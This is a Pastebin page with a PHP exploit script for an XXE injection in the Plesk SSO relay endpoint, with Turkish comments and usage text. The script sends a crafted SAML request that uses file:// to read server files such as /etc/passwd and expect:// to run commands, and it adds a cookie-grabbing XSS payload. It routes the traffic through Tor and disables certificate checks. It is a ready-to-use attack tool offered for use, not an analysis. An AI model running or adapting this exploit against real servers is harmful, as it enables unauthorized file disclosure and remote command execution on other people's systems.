API tools faq
paste
Advertisement
z00

Plesk SSO XXE injection remote exploit by z00

z00
Jun 12th, 2014
390
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.77 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. /*
  4.  
  5. ████████████████████████████
  6. █______¶¶¶¶¶¶______________█
  7. █____¶¶¶¶¶¶¶¶¶¶____________█
  8. █___¶¶¶¶¶¶¶¶¶¶¶¶¶__________█
  9. █__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶_________█
  10. █_¶¶¶¶¶¶¶______¶¶¶_________█
  11. █_¶¶¶¶¶¶________¶¶__¶¶_____█
  12. █_¶¶¶¶¶¶____________¶¶¶____█
  13. █_¶¶¶¶¶_____________¶¶¶¶¶¶_█
  14. █_¶¶¶¶¶____________¶¶¶¶¶¶¶_█
  15. █_¶¶¶¶¶___________¶¶¶¶¶¶¶__█
  16. █_¶¶¶¶¶____________¶¶¶¶¶¶__█
  17. █_¶¶¶¶¶_____________¶¶¶¶¶¶_█
  18. █_¶¶¶¶¶¶____________¶¶¶_¶¶_█
  19. █__¶¶¶¶¶¶______¶¶___¶¶_____█
  20. █__¶¶¶¶¶¶¶____¶¶¶__________█
  21. █___¶¶¶¶¶¶¶¶¶¶¶¶___________█
  22. █____¶¶¶¶¶¶¶¶¶¶____________█
  23. █_____¶¶¶¶¶¶¶______________█
  24. ████████████████████████████
  25.  
  26. Plesk SSO XXE injection (Old bug) Exploit
  27. Coded by z00 (electrocode)
  28. Twitter: electrocode
  29. Test video: http://www.youtube.com/watch?v=G6ft9odXcuU
  30. PacketStorm added : http://packetstormsecurity.com/files/127078/Plesk-10.4.4-11.0.9-XXE-Injection.html
  31. Not: Tor kurulu değilse  proxy kismini kaldirin
  32.  
  33. Bug founded http://makthepla.net/blog/=/plesk-sso-xxe-xss
  34.  
  35.  
  36. Tüm İslam Aleminin Beraat gecesi mubarek olsun dua edin:)
  37.  
  38. */
  39. function Gonder($domain,$komut,$method){
  40.     switch($method)
  41.     {
  42.     case "cmd":
  43.     $komut = "expect://$komut";
  44.     break;
  45.     case "read":
  46.     $komut = "file://$komut";  
  47.     break;
  48.     default:
  49.     $komut = "file://$komut";
  50.    
  51.     }
  52.  
  53. $adres = "https://$domain:8443/relay";
  54. $paket = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><!DOCTYPE doc [ <!ENTITY xxe SYSTEM \"$komut\"> ] >
  55. <samlp:AuthnRequest xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\" xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\" ID=\"dff578c3049f5ba10223df820123fcccbc134e7520\" Version=\"2.0\" IssueInstant=\"2014-05-08T11:58:33Z\" Destination=\"javascript:prompt(document.domain,document.cookie)\"> <saml:Issuer>&xxe;</saml:Issuer> <samlp:Extensions> <UI><URL>&xxe;</URL></UI> </samlp:Extensions> <ds:Signature xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\"> <ds:SignedInfo><ds:CanonicalizationMethod Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/> <ds:SignatureMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"/> <ds:Reference URI=\"#dff578c3049f5ba10223df820123fcccbc134e7520\"><ds:Transforms><ds:Transform Algorithm=\"http://www.w3.org/2000/09/xmldsig#enveloped-signature\"/><ds:Transform
  56. Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/></ds:Transforms><ds:DigestMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#sha1\"/><ds:DigestValue>5BWiyX9zvACGR5y+NB2wxuXJtJE=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>S4LhCUOB0ylT4cjXUVAbnvrBjBBzybaxvWHTGw9JnRsyUB1MetRK+VHvV/M3Q4NX0DGUNFXlCZR3sM2msQOAhbjZxkKQCNUBig56/03pgsXlpWJFhnBL8m0sRRZBduf4QdHn/hxxyvAKzadPQ5nmIPmCPpO1CQsRUTMrt/13VIE=</ds:SignatureValue> </ds:Signature></samlp:AuthnRequest>";
  57.  
  58. $exploit = urlencode(base64_encode($paket));
  59. $relaystate = gethostbyname($domain);
  60. $relayadres = urlencode(base64_encode($relaystate));
  61. $postlar = "SAMLRequest=$exploit&response_url=http://hax&RelayState=$relayadres&RefererScheme=https&RefererHost=https://$domain:8443&RefererPort=8443";
  62.  
  63.  
  64. $ch = curl_init();
  65. curl_setopt($ch, CURLOPT_URL,$adres);
  66. curl_setopt($ch, CURLOPT_POST, 1);
  67. curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
  68. curl_setopt($ch, CURLOPT_REFERER,$adres);
  69. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  70. //Proxy
  71. curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:9050");
  72. curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  73. //Proxy end
  74. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);  
  75. curl_setopt($ch, CURLOPT_POSTFIELDS,$postlar );
  76. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  77. $sonuc = curl_exec ($ch);
  78. curl_close ($ch);
  79. $gelenpaket = //"Paket: " . $postlar .
  80.                     "Gonderilen Paket Boyutu: " . strlen($exploit)."\nRelayAdres: $relaystate\nSonuc: \r\n\r\n$sonuc \n";                  
  81. return $gelenpaket;
  82. }
  83.  
  84. if($argc < 4){
  85. $kullanim =  "########################################################################\n"; 
  86. $kullanim .= "Plesk XXE Exploit Tool by z00\n";
  87. $kullanim .= "Kullanimi : php $argv[0].php domain /etc/passwd read                          \n";
  88. $kullanim .= "Example : php $argv[0].php adres cmd (only expect installed) method      \n";
  89. $kullanim .= "Kullanilabilir Methodlar : \ncmd (Expect kurulu ise)\nread (Dosya okur)  \n";
  90. $kullanim .= "########################################################################\r\n";
  91.  echo $kullanim;
  92. } else {
  93. $domain = $argv[1];
  94. $komut = $argv[2];
  95. $method = $argv[3];
  96. echo Gonder($domain,$komut,$method);
  97.  
  98. }
  99.  
  100. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!